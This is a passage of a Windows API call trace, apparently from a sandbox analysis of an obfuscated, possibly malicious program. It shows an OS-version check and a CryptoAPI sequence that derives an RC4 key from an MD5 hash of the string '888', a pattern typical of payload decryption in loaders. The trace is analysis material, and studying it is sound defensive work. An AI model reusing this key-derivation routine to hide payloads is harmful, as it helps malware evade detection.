lpMsg=0x8cf248) returned 0 [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0215.373] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0215.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0215.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.374] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0215.375] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0215.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0215.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.375] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.375] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.375] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.375] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.376] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0215.376] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0215.376] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.376] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.376] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.376] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.376] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.376] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0215.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0215.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ee0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0215.376] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bf78) returned 1 [0215.377] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.377] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.377] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0215.377] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.377] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0215.377] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.377] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.377] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.377] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.377] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.377] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.377] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.378] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.378] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.378] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.378] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.378] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.378] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.378] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.378] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.378] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.378] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0215.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.378] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0215.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.378] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.378] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.378] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.378] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.378] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.379] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.379] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.379] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.379] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.379] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.379] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.379] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.379] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.379] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.379] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.379] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.379] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.379] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.379] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.379] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.379] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.379] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.379] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.379] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.379] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.379] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.379] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.380] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.380] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.380] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabbf0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0215.380] CryptCreateHash (in: hProv=0xa7bf78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0215.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71eb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.380] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0215.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71db8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.380] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.380] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.380] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.380] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.380] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.381] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0215.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabb30, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0215.381] CryptHashData (hHash=0x9e1bf8, pbData=0x2a71e88, dwDataLen=0x3, dwFlags=0x1) returned 1 [0215.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.381] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.381] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.381] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.381] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.381] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0215.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabad0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0215.381] CryptDeriveKey (in: hProv=0xa7bf78, Algid=0x6601, hBaseData=0x9e1bf8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2138) returned 1 [0215.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.382] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.382] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.382] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.382] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.382] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0215.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7000, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0215.382] CryptDestroyHash (hHash=0x9e1bf8) returned 1 [0215.382] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.382] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.382] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.382] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.382] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) 